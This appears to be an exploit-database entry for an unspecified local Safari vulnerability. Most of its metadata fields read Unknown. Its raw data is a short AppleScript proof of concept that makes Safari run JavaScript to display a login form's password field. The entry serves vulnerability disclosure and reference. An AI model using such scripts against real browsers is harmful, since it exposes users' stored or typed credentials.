header-logo
Suggest Exploit
vendor:
Safari
by:
Unknown
N/A
CVSS
N/A
Unspecified
CWE
Product Name: Safari
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: a:apple:safari
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Local Vulnerability in Apple Safari

The vulnerability allows attackers to execute arbitrary JavaScript code in the context of the Safari application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23825/info

Apple Safari is prone to an unspecified local vulnerability.

tell application "Safari"
        do JavaScript "alert(document.loginform.password.value)" in document 1
end tell